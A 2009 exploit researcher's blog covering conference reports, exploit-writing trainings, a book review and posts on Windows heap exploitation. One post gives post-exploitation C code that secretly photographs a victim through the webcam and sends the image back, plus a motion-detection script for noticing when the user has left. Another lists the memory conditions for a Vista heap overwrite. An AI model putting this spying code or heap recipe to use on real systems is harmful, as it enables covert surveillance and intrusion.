jueves, 24 de septiembre de 2009

Ekoparty 2009 was a total blast!!



When i decide to write this review I know it was going to be hard to be impartial on this, but the heck with it!

Ekoparty 2009 was a total blast!! Around 500 people got together on the 17 and 18th of September in the cultural center Konex to merry, learn and party a little bit.



The conference has a really interesting line-up, some of the most respected researchers around the globe such as Moxie Morlinspike, Luis Miras, Charlie Miller, Cesar Cerrudo were given insightful and original presentations.



But that's doesn't make a conference good. What it makes this conference the best one in latin america was the venue, the people that came from different part and the level of detail and effort that the organizers invested on every single spot of the conference in order to mix the best of the two worlds: a little bit of business, a little bit of underground.

I gave a turbo talk presentation on the infamous FreeListInUse technique, explaining where it original came from, how was developed and what was the original concept behind it. But sadly it was too much information in such a small amount of time that people not familiar with exploitation couldn't get the real juice about it. Next time (H2HC), i will try to overuse metaphors to explain how things works. (I will post the slides soon)




The great privilege as a speaker, was to use the Juan Pablo's masterpiece the WOPR. He made a replica of the Wargames WOPR, which leds and the corresponding counter and on the back you had a place to set your laptop.




We set a nice stand where we had the chance to gave NOP Certifications, sadly nobody pass this time, we hope that next year we had more people playing! Also some people get to the stand to get a demo of the new internet hype, the SMBv2 exploit which we successfully gave.



As an Argentinian i couldn't be more proud for having a conference such as the Ekoparty to respresent us. It was a really nice time to get together with old friends and met new people.



From this spot, i just want to thanks Fede, Fran, Leo, Jero and Juan Pablo for the great conference they made this year!!

See you next year.
Nico
PS: You can find more pictures at: http://picasaweb.google.com/nicowow/EkoParty2009

domingo, 13 de septiembre de 2009

EkoParty 2009



Another exciting Ekoparty 2009 is around the corner this year and all the security jetset is hitting Ezeiza (Bs.As. Airport) this weekend.

On Monday and Tuesday, we will be throwing two trainings: Writing Windows Shellcode from the Scratch and Breaking Window.

Shellcode Writing training will be taught by Pablo Solè, and it will go from "i just run exploits" to "I can write my connectback and avoid badchars". Of course, depending on how familiar the students are with assembly, it can end in a "I`m escaping the current process by writing a fork() shellcode" or "Inject myself into another process to avoid heap corruption problems". All supported with a pretty neat django framework dave wrote to make you shellcode writing experience pretty smooth (I wish we had those back in the 90's).

The other training is a straight forward Windows Stack Overflow rated "G" by the Motion Picture Association, which means that if you are a student, network engineer, security professional, etc you can learn how to write Windows exploits in just two days and start looking at Microsoft advisory from a different focus.

On thursday the ekoparty is starting and I'm giving a presentation on "Abusing FreeListInUse", which it will be a 20 minutes turbo talk about how this technique was discovered in the first place and how can be exploited in the worst scenario. (Sadly, i won`t have much time to extend on other exploitation tricks but i might give an extended version on the H2HC in November).

Anyway, if you have plans to go send me a message or you will probably find me at Immunity`s stand on the Ekoparty.

Cheers,
Nico
PS: We will be doing the NOP Certification, so it will be a good time to prove yourself and your future employee that you can write stack overflow in less than 40 minutes :)

martes, 28 de julio de 2009

Exploiting the Heap Cache Allocator

Finally, one of the most awaited paper of 2009 was finally released. John "hzon" McDonalds bring us a bunch of refreshing techniques on one of the less inspected structures of the heap: The Heap Cache Allocator.
Although, he doesn't constrain just to the technique, but rather make a big picture of how the heap works and the different ways to exploit it. A MUST read.
Rather than making a review, I just recommend you fully read it.

http://blogs.iss.net/archive/RequiredReading.html

The cool things about playing with big blocks, is that they are not used much so you can force a nice predictable universe for exploitation.

To celebrate the paper, we are releasing the files needed to inspect the HEAP Cache on Immunity Debugger:
http://immunityinc.com/downloads/ImmunityDebuggerUpdate.tgz




Cheers,
Nico

lunes, 18 de mayo de 2009

Book review: Gray Hat Python



Dear diary,
We usually said that you can easily taught yourself python in just week, well, just add 5 more days and Justin Seitz new book "Gray Hat Python", to taught yourself how to be an python "hacker".
Don't expect this book to teach what you are not, that will be hard. But do expect that this book helps you to put your knowledge and ideas into a usable tool. That is what python is all about.
Justin is an experience reverse engineer and a tool person, I know that because I recommend him for his position at Immunity, when he was an early fun of Immunity Debugger project.
And he apply his year of experience into a book that answer the question to "What exactly do i need to learn from python to start writing my tools.
The book is well-written and direct.Through the 12 chapters, he will walk you into the concepts of debugging and fuzzing, and teach you how to write scripts to extend the capabilities of the best tool around: PyDbg, ImmunityDebugger, Sulley, IdaPython and PyEmu.
And if that wasn't all, he will go step by step into writing your own debugger in python, covering through the basic exception handling to hardware breakpoint.


I recommend this book for anyone who wants to get his hand dirty on python for the first time, either writing a tool or even an exploit, cause we always said at Immunity that exploiting is nothing more than intelligent debugging.

Peace
Nico

domingo, 26 de abril de 2009

MEMO: Heap training

Dear diary,
I'm finally back but just for a short message. Between writing exploits, developing with Kostya material for the "Windows shellcode writing" class (Check out syscan.org for more information) and living I didn't have much time left.
This small post is just to announce that i'm gonna be teaching the Heap class May 11-14 in Miami Beach (more info).
I usually try to update the material of the class, in fact, i can recall of a class which i use exactly the same material as the one before.
This time i'm going to add more information about XP/2003 bypassing specially where there is no lookaside on it (Which was the case of an exploit a week ago) and probably explain (with exercise) the FreeListInUse trick.
For the lucky of you that can make it, Nicolas Pouvesle will be explaining one of the introduced subjects.

Peace,
Nico (Waisman)

lunes, 13 de abril de 2009

Hacking like in the movies (or how to take a picture with your webcam)

Dear diary,
When you spent an amount of time diving on the heap on an exploit without any significant result, you start feeling the lack of productivity.
To avoid that feeling, i from time to time stop what i'm doing to get myself into a lame pet projects to clear my mine, in this case was tasking a picture with the webcam.
It's actual quite simple, unless you follow the CF_BITMAP path, in which case you will lost a day, until you figure out the solution is CF_DIB.
The key feature of MOSDEF is the possibility that you have to avoid touching disk or executing command, unless it's really needed, this will give a tremendous post-exploitation advantage over host based IDS. Each time i see people uploading a file and executing it, it chill my spine.
MOSDEF basically compiles a C code into process independent shellcode that gets the resolution of api functions remotely, as you might guess everything gets executed on the exploited process.
The first step to write out MOSDEF C post exploitation command, is to find out what api functions you need, in this case, to get a picture of a webcam. The first google choice was to use DirectShow, which is probably the smartest idea but translated into mosdef could be a little bit time consuming (yes, tomorrow im back to more heap). So my selection was to the capCreateCaptureWindow.
#import "remote", "avicap32.dll|capCreateCaptureWindowA" as "capCreateCaptureWindowA"

This function creates a video window (which you can obviously start hidden) and returns its handle. Based on the handle, you can send different message to either record video or take a picture.
In my case, was the second option, so i did the following:

// Create a Window and connect it to the driver
hwnd = capCreateCaptureWindowA("CANVAS", 0x40000000, 0, 0, 640, 480, proghwnd, 0);
SendMessageA(hwnd, 1024+10 ,0,0); // wm_cap_driver_connect
SendMessageA(hwnd, 1024+50 ,1,0); // wm_cap_set_preview
SendMessageA(hwnd, 1024+52 ,30,0); // set_previewrate

// Get a Frame and copy it to the clipboard
SendMessageA(hwnd, 1084,0,0); // get_frame
SendMessageA(hwnd, 1054,0,0); // wm_cap_copy copy to clipboard

You will think this is the hard part, but what it took me more time was to grab the picture out of the clipboard, since i try the to grab it as a CF_BITMAP and didn't work out as expected.
The solution was to grab it as CF_DIB which returns a memory object containg a BITMAPINFO structure and after that the actual raw image.

hbitmap = GetClipboardData( 8 ); // CF_DIB
pbih = GlobalLock( hbitmap );
pBits = pbih + 49;

hor = pbih->biWidth;
vert = pbih->biHeight;
bpp = pbih->biBitCount/8;
size = hor * vert * bpp ;

sendint(hor);
sendint(vert);
senddata2self(pBits, size);

This simply gets transformed into a small python command called "saycheese"

That after its get executed, you will get a scary face like this one inside your screenshot section


Neat, a picture is worth a thousand words, at least for your boss or your clients.
But if you are one of those owl hackers (*blink*) that wait into the deep of the night for your prey to stop using the machine so you can start downloading the 3gb database, you can rest now.
I add a small script that runs our motiondetection command, that returns the motion's percentage based on two pictures taken through the webcam (the algo is quite simple, just compare pixel by pixel to find out change).
Aside of the percentage, it returns into a neat picture showing the place where motion was found. (NOTE: Any resemblance of any character to any actual person, whether living or dead, is purely coincidental, specially with that Keanu Reeves movie).



EDIT: Juano@Netifera share his knowledge on the subject. To improve accuracy of the motion detection algo, you can take a couple of pictures and create an array based on the average pixel on each position, that will give you a decent background image to compare with.

Peace
Nico

martes, 31 de marzo de 2009

Sean eternos los laureles...

It seems like there are an irregular amount of infected computers with that Conflicter worm, the Paris Hilton of the worms, (quoting some blog i lost the url) from Argentina as this CAIDA research shows: http://www.caida.org/research/security/ms08-067/conficker.xml



Argentina stands out has having a disproportionately large number of infected IP addresses
.

Two theories:
o Either the Conflicker worm was created here (Yes, I'm talking about you)
o or their version of the MS08-067 works pretty well on Spanish windows.

If tomorrow morning, when you are reading the news, you start seeing an important amount of Maradona's pictures, you will know the correct answer.

lunes, 30 de marzo de 2009

Small tools, Big hearts: A guide to Caring for your little tool

Dear Diary,
Bas always says that exploiting is nothing more than intelligent debugging. I agree, specially because I have probably a couple of weeks ahead schedule for more debugging...

So if that your case too, let me give you a hand:

Let said, you are planning your heap primitive. These days, you have to aim for something like the Lookaside single-list pointer, the Bitmask trick (a.k.a. a free chunk < 1024 and the only entry of that freelist or just a free chunk) or any other of the Brett Moore tricks.

The point is, that you need a special heap layout so when the actual overwrite happens, you modify exactly the chunk you plan to. That takes a lot of time, brain cells and a basket of try-error.
To help you reduce time, we wrote this simple hook script, that has been on ID for years:


!chunkanalizehook -a ADDRESS (exp)
ADDRESS of the place where you want to set a hook
(exp) expression to calculate the chunk address

The basic idea is, you set the script on the code address exactly before the actual overwrite is going to happen, and this will automatically dump you the chunk given by the "expression" argument and the next couple of chunks.
For example, let say you have this piece of code:

402020: MOV EDI,DWORD PTR DS:[EAX]
402022: SHR ECX,2
402025: REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]


When eip points to the opcode 402022, EDI will be the overwriting chunk data. So what you have to is set chunkanalize at the beggining of that chunk

!chunkanalizehook -a 0x402022 EDI - 0x8

And you can now run your exploit, each time that opcode gets executed, you will see on Immunity Debugger Log Window (Alt+L), the heap dump:


034CBC58 > Hit Hook 0x00402022, checking chunk: 0x034cbc58
===============================================
0x034cbc58> size: 0x00000520 (00a4) prevsize: 0x00000050 (000a)
heap: *0x00000000* flags: 0x00000001 (B)
0x034cc178> size: 0x00000410 (0082) prevsize: 0x00000520 (00a4)
heap: *0x00000000* flags: 0x00000000 (F)
next: 0x035fd930 prev: 0x034c0178
0x034cc588> size: 0x000002a8 (0055) prevsize: 0x00000410 (0082)
heap: *0x00000000* flags: 0x00000001 (B)


The first chunk is the overwritting chunk, the second one the one that soon is gonna get modified.
Seems I'm not lucky yet, hopefully you are

Peace,
Nico
PS: Take a look at the python script (PyCommands folder), it can be improved quite easily!

jueves, 26 de marzo de 2009

Technical trainings: The good, the bad, the weird.

Dear Diary,
I'm back in Buenos Aires again, enjoying the end of the summer. The training madness is over, until next May where i'm back with the heap overflow class.
Don't get me wrong, teaching is my favourite task at Immunity and out of it (Next week I'm gonna start as a teacher assistant on the subject "Ethics" on a local university. Greek tragedy is what I will be explaining). But the true is that training takes a lot from you, and at the same time it gives you so much.
My favourite part is in day two, when everything start making sense and you can see people really enjoying each exercise when they put all the pieces together.


The japanese training was amazing, I couldn't enjoy it more. The class was funny and entraining, one of the guys at the beginning of the class introduce himself as Shoichi Nakagawa, Japan's minister of finance who gave a press conference drunk.



The only big problem that i had was obviously the language. I got two girls translating, but it wasn't simultaneous so I have to make a pause on each phrase so its get translate.
The trick I pull to make it more dynamic, was to make a random student who finish the exercise explain what he did and why in the projector computer. It was a win-win situation, students got a second explanation in Japanese while the selected student explanation help him understand the subject even more deeply by being able to teach it.
People there were quite nice, we had pizza and some drinks on the first day, and at some point everyone got in a circle and start giving a small speech of who they were and what they expected for the class. I wish I can do that on every class!
I guess the main problem that i had with languages, was not to be able to listen to what students talk between each other, that's usually a key factor of a class, because it allows me to identify levels and gave different exercise upon it.

Japan itself was amazing, and I want to thanks on the website to the people from cyberdefense (Jack-san, Lauri-san, Yusuke-san and Matsumoto-san) for the big hand they gave me on the training.

They also took us to a traditional salaryman restaurant near Akihabara, where we try different types of local dishes and the freshest sushi i ever try. (yes, all the fishes in the picture were alive).


Going back to the training, I went back from Japan to Buenos Aires, only to stay two days and then back to Miami to give two more training with my dearest friend Kostya Kortchinsky. Those training were pretty good and we got quite an amount of really skilled students, it was a real surprise to see everyone at the same level!
Back in the airport, waiting for my flight back to Buenos Aires, i put together a list of rules (or tips) that i had being collecting over the years:


o Never ever ever never start compiling and fixing stuff in the middle of the class (only like 10 minutes max is allowed).
o Don't look insecure
o Be comfortable with your material, remember to read it and know exactly what is comming next. It's really common to get excited and start explaining stuff that might appear later.
o Always tell war stories.
o Most difficult task: Be prepare for the most advanced student and for the most inexperienced.
o Don't spent your entire class on the slow students: Try to push him, help them as much as possible, but don't loose the track of the class. You request at the beginning of the class for basic requirements that is the student responsibility to get before class.
o Always bring extra exercises.
o Real life examples is always a win. People enjoy owning a real server vs your exercise server.
o Improvization is good and people will appreciate it, only when your material is solid.
o Not knowing the answer of all the question is ok. You are not god neither Kostya.
o Exercise, Exercise and more Exercise. Always support your material with hand-ons exercise.
o Students love owning stuff, if they can archive shellcode execution they will be happy++. The satisfaction of writing a workable exploit is priceless, even tho is on your "hoolio" server.
o Be progressive with your exercise. Each exercise has to teach at least one new thing or introduce a new challenge.
o One, two even three challenges are ok per exercise, but try not overwhelm the students.


Peace,
Nico

viernes, 20 de marzo de 2009

no more free bugs?

It is me or this "no more free bugs" movement is as old as Methuselah?
I think the real challenge would be "no more pennys for bugs".


Nico
PS: Does fame count as money? Cause i had seen a lot of bugs paid with that currency.

martes, 10 de febrero de 2009

If you are doing your homework correctly, you will get... (II)


Dear Diary,
Tokyo's Trainning is next week, and I just finished writing the last exercise for day 3. If you did it correctly, your Visualsploit would look like figure above.
The exercise is for Windows 2003, and the objective is to exploit the heap overwriting a Lookaside pointer. The options were, I made my own server or the students have to install Citrix 4.5 to own Brett Moore bug ;)
After the lookaside trick, it will be pulling a HEAP to Stack trick, and finishing with a ret2libc to disable DEP protection.
Learning how to exploit the heap correctly is like learning programming, once you learn how to code in C you can do it on everything else.
The C of heap learning is Windows 2000 Exploitation. Once you master the way to control the heap, predict how it's gonna look and diagnose a crash without looking at code, you are ready for everything else (And that's pretty much include other SO heaps).
That's the real extra value of this class, and that is why the first day of class is so hard.

In other news, someone wrote a paper on format string using Immunity Debugger http://milw0rm.com/papers/282.

Cheers,
Nico
PS: Tomorrow I have tickets for Peter Murphy for the first time in Buenos Aires. I'm so getting a Bauhaus tshirt.

jueves, 5 de febrero de 2009

MOSDEF 2.0 is out!


Dear Diary,
MOSDEF 2.0 is out, let's the hype begging...
Wait...
Were is all the cheering?
Do we need to coordinate with a lot of vendors to make it cool?
Ah, or probably announce it secretly teasing everyone of something that it doesn't do?

The interweb had change quite a lot lately...

Anyways, MOSDEF v2.0 a LGPL C-like compiler written in python is out. And it's incredible fast.
Why you will be using it? Because if fun, because it's simple to use and practical.
Other than using the usual compiler capabilities, you can use MOSDEF inside your exploit for shellcode. Rather than the usual stolen string shellcode, you can now write your own by do doing:
from MOSDEF import mosdef
mosdef.assemble("jmp %ebx", "X86") # or "PPC"

Simple and useful. But this is like the most simple thing you can do with it, there is a huge world of things you can no do.
I would love to see people start doing their own packers/polymorphic shellcode over MOSDEF.

The compiler chain works this way (stolen from rich's pdf):
cc.py -> cpp.py -> cparse2.py -> il2X86.py -> x86parse.py -> makeexe.py

If you want to see the mechanic of the compiler, you probably want to take a look at the first three files, but what we really gonna care for any cool new tool is the last 3 files:

il2X86.py takes a really simple to understand Intermediate Language, and transform it into assembly. Let's see some examples:


def _loadint(self, words):
return ["movl $%d,%%eax\n" % long(words[1],0)]

def _call(self, words):
return ["call %s\n"%words[1]]

def _subconst(self, words):
return ["subl $%d,%%eax\n"%int(words[1])]


It will be really simple, based on the IL to transform the IL into a virtual machine packer.

x86parser.py It's the file in charge of transforming the output assembly into opcode.
makeexe.py This file is in charge of creating, based on the created shellcode a binary with the corresponding fileformat. If you are talking Windows (which is not released on 2.0, canvas client's only for now), you can probably create one of the smallest PE a compiler can gave you (And forget about IAT or any Import.). And this step you can easily create your own ELF, including whatever tweak you might wanna add.


Hopefully soon I will made a bigger post with much more details. For a good read, get Rich's paper. Or directly download MOSDEF 2.0 sources.

Cheers,
Nico
PS: Since we released MOSDEF 2.0, we are preparing a one-two day trainning on Windows 32 Shellcode writing. If you are interested, ping me.

viernes, 30 de enero de 2009

Hacking mainstream



Dear diary,
Back in the time, when I was a still doing linux exploits and thought that real man infoleak/bruteforce themselves to shellcode, that client-side where for pony tails nymphets and denial of service on hoolios where for lonely guys that drinks fruit daikiris, Dave came to me with a new project that he wants me to manage: Visualsploit
At first though "I prefer to write advisory for Antivirus vulnerabilities" rather than working on a Visual Language for exploits, who in the world would ever use that?.
And as it happen with smart people vision, time gave you always the response to that. We hired Damian Gomez full time to work on the project, I helped a little bit with the core but most of them it was just Dami, all the nice icons and the cool features.
Visualsploit was never focus on selling it, as i though, but rather as a swiss knife for Trainnings. The visual language gives -great- advantage of avoiding dealing with programming at all on a class, obviously, we encourage people to modify the scripts and learn the python, but for classes such as Basic Stack Overflow or even Heap overflow, whats the need of forcing someone to learn python? In the end, is as we always said... Exploiting is nothing more than smart debugging.
Today I spent an hour adding two modules that communicate with my exercise server, one for allocating memory and the other one for overwriting information. Because, if you have 4 days to explain how to exploit Windows 2000, XP-2003 and Vista, you certainly don't want to make your students spent time debugging the protocol.

Cheers,
Nico
PS: Yes, the icons for Allocate/Overwrite were also made by dami!

lunes, 19 de enero de 2009

Hacking Vista Heap: The Ben Hawkes technique part II



"Even though I walk through the valley of the shadow of death, I will fear no evil..."


On the blog entry "If you are doing your homework correctly..." i showed a little bit how you can modify the LSB of a heap pointer and after freeing it, you can get the heap address on a RtlAllocateHeap call. This is part of Ben Hawkes presentation at RUXCON.

The second step was to construct the overwritting buffer for the Global Heap structure that will allow you to trigger the RtlCommitRutine (which is a function pointer that it triggers when the heap wants to be extended).
To created, you need two hardcoded address (or heap-spray based, or other lovely trick based as sotirov-downd .NET dll load), for the "BlockIndex" and the "UCREntry" else you will suffer for all kind of reading/writing crash in ntdll.dll.

Now, i might be wrong with this statement but on the code flow i follow, the first hardcode address need to fullfilth much more requirements than the one announced by the good old Ben.


BlockIndex
There are a couple of ways to allocate on the Vista Heap, which depends on the heap usage (f.e.: The activation of the Low Fragmentation Heap on a given size), argument passed, etc. In our case, to extend it we are gonna allocate without using a Bucket which is the common behaviour.
The BlockIndex is a structure which is saved at [PHEAP+0xB8] and is the first hardcode address we need to craft.

This structure has a single-list which connect other BlockIndex, so our address should have the first Dword as 0x0
*( Blocks + 0) == 0x0

The next dangerous point in code, is when the Block use the FreeListPointer to get a double linked list of chunks out of it.
*( Blocks + 0x18 ) == FLP (FLP needs to be a existing readable addresss)


FLP as I said before, is a double linked list, so the algorythm will take the Backward Link to grab the first chunk out of it.

*(FLP + 4) === CHUNK (CHUNK needs to be readable)


And later, it will take the CHUNK and check the first dword of it and compare it against PHEAP-EncodeFlagMask
*(CHUNK - 8 ) == CONSTANT (if it's zero, its better).


And that it! (he he).
Yes, it doesn't pass the strawberry pudding rule, but as hard as it looks, it's not -that- hard to find address that fullfilth all those requirements. The 2nd hardcode address (UCREntry) requirements are well explained on Ben Hawkes presentation.
I wrote a simple but useful script that try to find addresses that accomplish all those requirements, and believe it or not, there a lot of them.



The question now is: Can we really find one not affected by ASLR?

Peace,
Nico

PS: I don't want to spoil the scoop for the Japanese students on the Heap class, so I will release the script after class ;). (Anyways, you can do it yourself, it's just a couple of readLong).